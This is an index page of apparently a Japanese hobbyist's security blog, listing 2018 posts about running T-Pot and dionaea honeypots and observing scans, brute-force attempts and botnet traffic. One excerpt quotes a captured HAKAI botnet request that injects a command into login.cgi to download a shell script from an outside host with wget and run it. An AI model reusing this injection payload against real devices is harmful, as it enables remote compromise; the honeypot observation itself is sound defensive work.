セキュリティ系の勉強、その他開発メモとか雑談. GithubはUnity触っていた頃ものがメイン Twitterフォローもよろしくです

ハニーポット

t-pot 観察 #7 2018/12/9-15 SMTPへの継続アクセス観測中

お久しぶりです。しばらくサボっていました。 先週の状況を簡単にまとめます。(サボってたので先々週分とかはないです) 全体 気になるのは香港のグラフですね。 香港からtelnet(23) CVE-2015-7755。Juniper ScreenOS の脆弱性でTELNETセッション中に不特定の…

NICTのポートスキャン来てた

すっかり忘れてました 他の人がハニポで観測しているのを見て思い出しました。 公式のお知らせ 公式からのお知らせによると、11月14日(水) に開始し、来年1月末までを目途に継続して行われるとのこと。その際使用されるIPアドレスは、210.150.186[.]238, 12…

t-pot 観察 #6 明け方からアクセス増加

こんにちは。目立つログが残っていたので、メモしておきます。まず、今月のここまでのハニポ全体の記録をみてみます。 今の所今月一のアクセス数です。では中身を見てみます。上のグラフと形が似てしまっていますが、今日(14時まで)の記録です。 Cowrieが…

t-pot 観察 #5 イギリスからのpop3ブルーフォース

2018/11/6 12:00~12:30 イギリスからpop3(110番)へのブルートフォース攻撃をhoneytrapで検知。大した量じゃないけれど、通常時は観測しないイベントだったのでここに書いておきます。 Suricataでのアラート名はET SCAN Rapid POP3 Connections - Possible Br…

dionaea virustotalを有効にする

ふとこの記事が何故か下書きで眠っていました。書きかけだったのでしょうか、、?とりあえず公開しておきます。 導入 Dionaeaのバージョンは0.6.0です。/opt/dionaea/etc/dionaea/ihandlers-available/virustotal.yamlを/opt/dionaea/etc/dionaea/ihandlers-…

T-pot観察 #4 2018/11/5 5060へのアクセス増加

全く書くことがなく気がついたらこんなに日が空いてしまいました。(パソコン修理とかしてたしね) 本日珍しくdionaeaの検知数がCowrieを超えたので報告しておきます。 2018/11/5 00:30~ 上のグラフはここ一週間のt-potへの総アクセスを集計したものです。11/5…

T-pot観察 #3 2018/10/9~10/17

だいぶ日が空いてしまいましたが、3回目です。と言っても対して知識も増えていないので、いつも通り眺めるだけです。 全体のログ いつも通りCowrieでは短時間の集中アクセスを度々受けていますね。目立つものとしてはロシアとカタールからでしょうか。カター…

T-pot観察 #2 2018/10/5~10/8

めでたく2回目を迎えました。ぱちぱち 気になったこと少しだけ書きます。目立ったものは2つ。 中国からのアクセス(10/5, 17:00~10/6, 2:00) 112.250.190[.]96からも32477回のアクセスを受けていますね。デフォルトのパスワードを試して侵入しようとしている…

T-pot観察 #1 2018/10/1~10/4

ちゃっかり記事に数字入れてますが、続くかわかりません。ハニポ(セキュリティも)初心者が自宅のハニポを見て思ったことをテキトーに綴って行きます。 アクセス Cowrieへのアクセスが圧倒的に多いですね。時間軸で見ると、いつアクセスが多くなったのかがわ…

【ハニポ】T-potの導入

つい先日までdionaeaを運用していたのですが、急遽T-potを栽培することに。理由は色々ありますが、一番の原因はDionaeaFRが動かなかったこと。(いや動かすところまでは頑張った。。)てことで、前まではVPS上で動いていたハニポを自宅に置きます! 動作環境 $…

HAKAIボットネットからの攻撃と思われるログ(2018-9-24)

短めです。下のログはdionaeaで検知したログ。スペースと改行の表記がうまくできていないのはご了承ください。 stream = [('in', b'GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1\x0…

dionaeaのログをちょっと見てみる2

今回は短く、UPnPのログに関して。 UPnP ウィキペディアさんには、Universal Plug and Play (UPnP)は、機器を接続しただけでコンピュータネットワークに参加することを可能にするプロトコルである。機器をコンピュータに接続するだけで利用可能になるPlug an…

dionaeaのログをちょっと見てみる1

初めに ログを見たり、知識なんてものもない人がゆっくりとログを見ていくだけです。間違ってることの方が多いかもですが、こういうことで慣れていかないといつまで経っても進まないので、、とりあえずhttpの通信記録を少し見てみる。 1 /opt/dionaea/var/di…

dionaeaのサービスを見てみる

とりあえず、公式のこのページを参考に1つずつ見ていけたらなぁと思ってます。 Service — dionaea 0.8.0 documentation その前に 外部からnmapをした時に、dionaeaとバレてしまう可能性があるのでそれを修正します。参考サイトはこちらです。 # nmap ipアド…

dionaeaのVPSのポートがclosedばっかり - ハニーポットのポートが開かない

先日dionaeaをVPSに導入し、早く攻撃来ないかなとか思ってたんですが、全く来ないしログも増えない。すぐにおかしいなと思って、自分(VPS内から)をnmapでポートスキャン。 次に外部(自宅環境)からポートスキャン。 外から見るとポートが閉じてますね。他の方…

今更さくらVPS借りてパニーポット(dionaea)

タイトル通り。 T-Potとかいうdionaeaとかを含んでなおかつログ等もうまい具合に可視化してくれるとかいう高級なものはのちに利用するとして、今回は自分でログとかを見ることを目的にdionaeaを入れます。 VPSを契約する & OS設定 vps.sakura.ad.jp とりあえ…